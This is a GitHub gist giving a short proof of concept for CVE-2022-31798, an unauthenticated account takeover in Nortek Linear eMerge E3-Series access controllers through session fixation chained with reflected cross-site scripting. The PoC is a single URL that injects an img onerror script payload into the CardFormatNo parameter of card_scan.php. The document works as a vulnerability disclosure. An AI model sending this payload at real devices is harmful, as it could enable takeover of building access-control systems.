Skip to content

Instantly share code, notes, and snippets.

Created August 7, 2022 19:36
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
CVE-2022-31798 PoC
# Exploit Title: Nortek Linear eMerge E3-Series - account takeover
# Exploit Author: Omar Hashim
# Version: 0.32-07p
# Vendor home page:
# Vendor home page:
# Authentication Required: No
# CVE: CVE-2022-31798
# Description
There is local session fixation that chained with reflected cross-site scripting leads to account take over of admin or less privileged users
# Proof Of Concept:
http://<HOST:PORT>/card_scan.php?No=1337&ReaderNo=1337&CardFormatNo=<img src=x onerror=alert(document.location)>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment